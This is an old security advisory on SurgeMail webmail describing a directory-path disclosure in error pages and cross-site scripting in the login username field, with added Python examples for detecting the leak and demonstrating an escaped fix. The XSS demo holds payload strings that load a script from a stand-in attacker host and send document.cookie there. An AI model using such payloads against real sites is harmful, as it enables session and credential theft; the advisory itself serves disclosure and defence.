------------------------------------------------------------
- EXPL-A-2004-002 exploitlabs.com Advisory 028 -
------------------------------------------------------------
- Surgemail -
OVERVIEW
========
"SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
and supports all the standard protocols
IMAP, POP3, SMTP, SSL, ESMTP."
SurgeMail suffers from two basic remote vulnerabilities:
1. Information Disclosure: requesting a non-existent filename causes the
server's STDERR to be rendered to the user, disclosing the physical
directory structure of the installation.
2. XSS (cross-site scripting) via the login form, in particular the
"username" field. This allows credential theft via externally hosted
malicious script. Both the HTTP and HTTPS access vectors are affected.
AFFECTED PRODUCTS
=================
Surge Mail
( Win32 and *nix, through version 1.9 )
WebMail v3.1d Copyright © NetWin Ltd
http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm
DETAILS
=======
1. Information Disclosure
SurgeMail's web-based interface reveals the physical
directory structure in the error page returned for a
non-existent (404) request.
http://x.x.x.x/[non-existant request]
http://x.x.x.x:7080/scripts/
"Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)"
http://x.x.x.x:7080/scripts/err.txt
"Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)"
http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()
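As an added example (not part of the original advisory), the following Python helper recognises the verbose error pages quoted above and pulls out the disclosed filesystem paths, so a scanner can flag the leak and record the install root rather than just noting a 404. The three sample response bodies are copied from the responses shown in this section; the function names, and the assumption that the Unix message always parenthesises the scripts subdirectory, are this example's own.

```python
import re
from typing import List, Optional

# Sample response bodies, copied from the error pages quoted in this advisory:
# two Windows variants (directory request, missing file) and one Unix variant.
WIN_DIR_ERROR = (
    "Could not create process D:\\surgemail/scripts/ Access Denied\n"
    "Is the url correct, check for a log file in the scripts directory\n"
    "and run the process in a shell window (D:\\surgemail)"
)
WIN_FILE_ERROR = (
    "Could not create process D:\\surgemail/scripts/err.txt File Not Found\n"
    "Is the url correct, check for a log file in the scripts directory\n"
    "and run the process in a shell window (D:\\surgemail)"
)
UNIX_ERROR = (
    "CGI did not respond correctly, it probably exited abnormally or the file\n"
    "may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()"
)

# One pattern per place a path appears in the messages above. The Windows
# "create process" path is the requested target, the "shell window" path is
# the install root, and the Unix message parenthesises the scripts directory.
WIN_PROCESS_RE = re.compile(r"Could not create process (\S+) ")
WIN_ROOT_RE = re.compile(r"shell window \(([^)]+)\)")
UNIX_SCRIPTS_RE = re.compile(r"\+x access \(([^)]+)\)")


def is_surgemail_disclosure(body: str) -> bool:
    """True if the body looks like one of SurgeMail's verbose CGI error pages."""
    return bool(WIN_PROCESS_RE.search(body) or UNIX_SCRIPTS_RE.search(body))


def extract_leaked_paths(body: str) -> List[str]:
    """Return every filesystem path disclosed in the body, in order, without duplicates."""
    paths: List[str] = []
    for pattern in (WIN_PROCESS_RE, WIN_ROOT_RE, UNIX_SCRIPTS_RE):
        for path in pattern.findall(body):
            if path not in paths:
                paths.append(path)
    return paths


def install_root(body: str) -> Optional[str]:
    """Best-effort SurgeMail install directory, or None if nothing is disclosed.

    Windows pages name the root directly. For Unix we assume (as the message
    text suggests) that the parenthesised path is the scripts subdirectory.
    """
    m = WIN_ROOT_RE.search(body)
    if m:
        return m.group(1)
    m = UNIX_SCRIPTS_RE.search(body)
    if m:
        return re.sub(r"/scripts/?$", "", m.group(1))
    return None


if __name__ == "__main__":
    samples = (
        ("win-dir", WIN_DIR_ERROR),
        ("win-file", WIN_FILE_ERROR),
        ("unix", UNIX_ERROR),
        ("clean", "<html><body>404 Not Found</body></html>"),  # constructed non-leaking page
    )
    for name, body in samples:
        if is_surgemail_disclosure(body):
            print(f"{name}: LEAK root={install_root(body)} paths={extract_leaked_paths(body)}")
        else:
            print(f"{name}: no disclosure")
```

Feed it the body of any 404 response from ports 80 or 7080; a clean page yields no match, while either SurgeMail error format yields the install root for the report.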
2. XSS ( cross site scripting )
The login form's username field is vulnerable to XSS.
================ snip ========================
http://x.x.x.x:7080/
http://x.x.x.x:7080/
http://x.x.x.x:7080/
================ snip ========================
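The original payload URLs did not survive above (only the bare host is shown), so what follows is an added example, not the advisory's proof of concept: a minimal stand-in for a login page that reflects the submitted username back into the form, first the way a vulnerable page does and then with context-aware output encoding. It goes a little beyond the advisory by probing both the text context and the value="..." attribute, since an attribute breakout needs no '<' at all. The page template, the render_login_* and username_input_attrs names, the attacker.example host and both payload strings are constructed for this example and are not SurgeMail code or the original exploit string.

```python
import html
from html.parser import HTMLParser
from typing import Dict

# Constructed stand-in for a webmail login page that echoes the username
# into a text node and into the input's value attribute.
PAGE_TEMPLATE = """<html><body>
<p>Login failed for {name_text}</p>
<form method="post" action="/login">
  <input type="text" name="username" value="{name_attr}">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>
</body></html>"""

# Constructed probe payloads (hypothetical attacker host). The first loads an
# external script from the text context; the second closes the value="..."
# attribute and adds an event handler, so it works even where '<' is filtered.
SCRIPT_PAYLOAD = '<script src="http://attacker.example/steal.js"></script>'
ATTR_PAYLOAD = ('" onfocus="location=\'http://attacker.example/?c=\'+document.cookie"'
                ' autofocus="')


def render_login_vulnerable(username: str) -> str:
    """Reflects the username verbatim in both contexts: the flawed behaviour."""
    return PAGE_TEMPLATE.format(name_text=username, name_attr=username)


def render_login_fixed(username: str) -> str:
    """HTML-encodes the username. quote=True also encodes " and ', which is
    what keeps the attribute value from being terminated early."""
    safe = html.escape(username, quote=True)
    return PAGE_TEMPLATE.format(name_text=safe, name_attr=safe)


def reflects_unescaped(page: str, payload: str) -> bool:
    """True if the raw payload survives into the response markup."""
    return payload in page


class _UsernameInput(HTMLParser):
    """Collects the parsed attributes of the <input name="username"> element."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs):
        found = {k: (v if v is not None else "") for k, v in attrs}
        if tag == "input" and found.get("name") == "username":
            self.attrs = found


def username_input_attrs(page: str) -> Dict[str, str]:
    """Parse the page as a browser would and return the username input's
    attributes. A safe page has exactly type/name/value and the value decodes
    back to the submitted string; an injected handler shows up as an extra key."""
    parser = _UsernameInput()
    parser.feed(page)
    return parser.attrs


if __name__ == "__main__":
    for label, render in (("vulnerable", render_login_vulnerable),
                          ("fixed", render_login_fixed)):
        print(f"{label}: script reflected raw ->",
              reflects_unescaped(render(SCRIPT_PAYLOAD), SCRIPT_PAYLOAD))
        print(f"{label}: username input attrs ->",
              sorted(username_input_attrs(render(ATTR_PAYLOAD))))
```

The parser-based check is the useful part for verifying a fix: string matching on the response tells you whether the bytes were encoded, but only parsing the result the way a browser does shows whether the attacker gained an attribute such as onfocus on the input element.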
SOLUTION
========
Vendor contacted May 16, 2003 (support-surgemail@netwinsite.com)
Vendor acknowledgement received May 17, 2003
Vendor Patch / Version 2.0c released June 2, 2004
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm
PROOF OF CONCEPT
================
( see DETAILS )
CREDITS
=======
These vulnerabilities were discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: morning_wood@exploitlabs.com
--
web: http://exploitlabs.com
web: http://zone-h.org